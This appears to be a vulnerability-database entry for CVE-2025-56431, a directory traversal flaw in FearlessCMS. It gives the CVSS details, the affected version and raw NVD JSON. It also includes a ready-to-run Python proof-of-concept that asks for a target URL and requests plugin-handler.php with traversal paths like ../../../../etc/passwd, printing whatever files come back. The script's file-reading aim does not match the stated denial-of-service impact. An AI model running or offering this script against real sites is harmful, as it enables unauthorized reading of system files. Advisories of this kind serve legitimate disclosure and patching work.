Security Vulnerability Report
中文
CVE-2025-56431 CVSS 7.5 HIGH

CVE-2025-56431

Published: 2025-12-10 19:16:14
Last Modified: 2025-12-18 20:16:03

Description

Directory Traversal vulnerability in Fearless Geek Media FearlessCMS v.0.0.2-15 allows a remote attacker to cause a denial of service via the plugin-handler.php and the file_get_contents() function.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:fearlessgeekmedia:fearlesscms:0.0.2-15:*:*:*:*:*:*:* - VULNERABLE
FearlessCMS v.0.0.2-15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-56431 PoC - FearlessCMS Directory Traversal DoS # Target: FearlessCMS v.0.0.2-15 # Vulnerability: plugin-handler.php file_get_contents() Directory Traversal target_url = input("Enter target URL (e.g., http://target.com): ").rstrip('/') # Path traversal payload to read sensitive files paths = [ '../../../../etc/passwd', '../../../../windows/win.ini', '../../../../boot.ini' ] print(f"[*] Testing CVE-2025-56431 on {target_url}") print("[*] Vulnerability: Directory Traversal in plugin-handler.php") print("-" * 60) for path in paths: url = f"{target_url}/plugin-handler.php?plugin={path}" try: print(f"[*] Requesting: {url}") response = requests.get(url, timeout=10) print(f"[+] Status Code: {response.status_code}") if response.status_code == 200: print(f"[+] Response Length: {len(response.text)}") if len(response.text) > 0: print(f"[+] Content snippet: {response.text[:200]}...") except requests.exceptions.Timeout: print(f"[!] Request timed out - possible DoS condition") except Exception as e: print(f"[!] Error: {e}") print("-" * 60) print("[*] PoC completed") print("[*] Recommendation: Upgrade to patched version")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56431", "sourceIdentifier": "[email protected]", "published": "2025-12-10T19:16:14.337", "lastModified": "2025-12-18T20:16:03.153", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Directory Traversal vulnerability in Fearless Geek Media FearlessCMS v.0.0.2-15 allows a remote attacker to cause a denial of service via the plugin-handler.php and the file_get_contents() function."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fearlessgeekmedia:fearlesscms:0.0.2-15:*:*:*:*:*:*:*", "matchCriteriaId": "B0B297A2-30E7-4B05-9DC1-E81B9B163229"}]}]}], "references": [{"url": "https://github.com/fearlessgeekmedia/FearlessCMS/issues/36", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/fearlessgeekmedia/FearlessCMS/issues/36", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking"]}]}}